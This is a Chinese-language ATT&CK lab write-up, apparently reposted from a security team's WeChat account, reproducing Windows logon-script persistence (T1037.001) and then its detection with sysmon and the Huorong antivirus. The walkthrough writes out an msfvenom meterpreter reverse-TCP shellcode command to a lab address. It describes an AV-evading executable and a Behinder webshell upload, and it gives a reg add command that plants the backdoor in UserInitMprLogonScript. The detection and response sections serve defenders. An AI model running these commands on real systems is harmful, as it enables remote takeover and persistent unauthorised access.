ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

admin 2023年1月17日18:58:29评论22 views字数 2307阅读7分41秒阅读模式
ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)



ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)


0x01 基础信息

具体信息 详情
ATT&CK编号 T1037-001
所属战术阶段 坚持
操作系统 windows10
创建时间 2022年11月26日
监测平台 火绒安全、sysmon
编写人员 暗魂攻防实验室网空对抗中心-G4br1el


0x02 技术原理

攻击者可能会使用在登录初始化时自动执行的 Windows 登录脚本来建立持久性。Windows 允许在特定用户或用户组登录系统时运行登录脚本。这是通过将脚本路径添加到HKCUEnvironmentUserInitMprLogonScript注册表项来完成的。

对手可能会使用这些脚本在单个系统上保持持久性。根据登录脚本的访问配置,可能需要本地凭据或管理员帐户。


0x03 复现环境

工具列表 相关链接
sysmon日志记录工具 https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
sysmon默认规则文件 https://github.com/SwiftOnSecurity/sysmon-config/blob/master/sysmonconfig-export.xml
sysmon安装命令 sysmon64.exe   -accepteula  -i  sysmonconfig-export.xml
实验命令 reg add HKCUEnvironment /v UserInitMprLogonScript /t  REG_SZ /d D:/phpstudy_pro/WWW/cms/Public/logon.exe


0x04 复现过程

首先先生成一个shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.44.128 lport=12345 --encryptbase64 -f c

ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

然后python制作免杀马,打包成exe

ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

通过模拟web站点漏洞(后台弱口令+上传点)上传webshell

资料列表存在一个文件上传点,我们上传冰蝎4.0的webshell

ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

找到上传的路径:http://192.168.44.130/Public/Uploads/1ndex.php

ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

访问一下,发现状态码200,应该是上传成功了

ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

然后使用冰蝎4.0进行连接

ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

上传exe后门

ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

然后执行

ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

然后进行使用注册表方式添加登录自启动进行权限维持

reg add HKCUEnvironment /v UserInitMprLogonScript /t REG_SZ /d D:phpstudy_proWWWcmsPubliclogon.exe


ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

当系统重启时,自动上线

ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)



0x05 检测方法

  1. 日志特征

    通过sysmon日志记录,使用注册表方式添加了自启动登录项

    ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

    ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)


2.攻击特征

使用reg.exe添加注册表时,火绒产生告警,匹配默认的规则库:windows登录脚本

ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)



0x06 处置方法与规则编写

  1. 处置方法:

    这种类型的攻击技术无法通过预防性控制轻易缓解,因为它基于对系统功能的滥用。当然我们可以安装EDR并且通过几个点进行一个监测规则:

    • 监视已执行的命令和参数,这些命令和参数可能会将系统设置配置为在系统启动或登录期间自动执行程序,以保持持久性或在受感染的系统上获得更高级别的特权。

    • 监视异常的内核驱动程序安装活动,这些活动可能会将系统设置配置为在系统启动或登录期间自动执行程序,以保持持久性或在受感染的系统上获得更高级别的特权。

    • 监视新构建的文件,这些文件可能将系统设置配置为在系统启动或登录期间自动执行程序,以保持持久性或在受感染的系统上获得更高级别的特权。

    • 监视对文件所做的更改,这些文件可能将系统设置配置为在系统启动或登录期间自动执行程序,以保持持久性或在受感染的系统上获得更高级别的权限。

    • 监视异常的内核驱动程序安装活动,这些活动可能会将系统设置配置为在系统启动或登录期间自动执行程序,以保持持久性或在受感染的系统上获得更高级别的特权。

    • 按进程监视 DLL 加载,特别是查找未识别或未正常加载到进程中的 DLL。查找可能由于进程加载恶意 DLL 而导致的异常进程行为。

    • 监视 API 调用,这些调用可能会将系统设置配置为在系统启动或登录期间自动执行程序,以保持持久性或在受感染的系统上获得更高级别的权限。

    • 作为自动启动程序的可疑程序执行可能会显示为异常进程,与历史数据进行比较以增加对恶意活动的信心,不应孤立地查看数据和事件,而应将其作为一系列行为的一部分,这些行为可能导致其他活动,例如为命令和控制建立网络连接,通过发现和横向移动了解有关环境的详细信息。

    • 监视可用于触发自动启动执行的机制的添加,例如注册表的相关添加。

  2. 火绒监测规则编写:火绒已自带相关规则库,需要在安全设置勾选此防护选项。

0x07 总结

通过本次实验可知,我们通过注册表添加自启动项进行了权限维持,当然我们安装EDR后可以对该注册表进行监测或拦截,还有其他添加注册表方式,比如添加至HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindowsload以及HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindowsload。


ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)


ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

ATT&CK实验-T1548-002滥用权限控制机制-绕过用户帐户控制

ATT&CK实验-T1134-001访问令牌操作

2022软考中级信息安全工程师备考笔记

【渗透测试】Vulnhub靶场之Machine_Matrix


ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)
ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)
微信搜一搜
ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)
暗魂攻防实验室


原文始发于微信公众号(暗魂安全团队):ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月17日18:58:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ATT&CK实验-T1037-001-引导或登录初始化脚本-登录脚本(windows)https://cn-sec.com/archives/1428401.html

发表评论

匿名网友 填写信息